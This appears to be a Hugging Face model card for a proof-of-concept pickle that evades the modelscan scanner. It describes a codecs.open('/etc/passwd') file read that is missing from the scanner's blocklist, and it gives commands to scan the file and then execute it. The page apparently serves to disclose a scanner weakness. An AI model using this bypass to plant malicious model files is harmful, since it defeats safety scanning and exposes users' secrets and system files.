modelscan-bypass-codecs-fileread
Impact
HIGH - Read arbitrary files (secrets, keys, config)
Technique
codecs.open('/etc/passwd', 'r') - codecs not in blocklist
Verification
# Scan with modelscan - should show "No issues found"
modelscan scan -p model.pkl
# Execute to verify malicious behavior
python3 -c "import pickle; pickle.loads(open('model.pkl','rb').read())"
Details
Modelscan bypass via codecs.open - Arbitrary file read Tested against modelscan v0.7.6 (latest PyPI release).
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support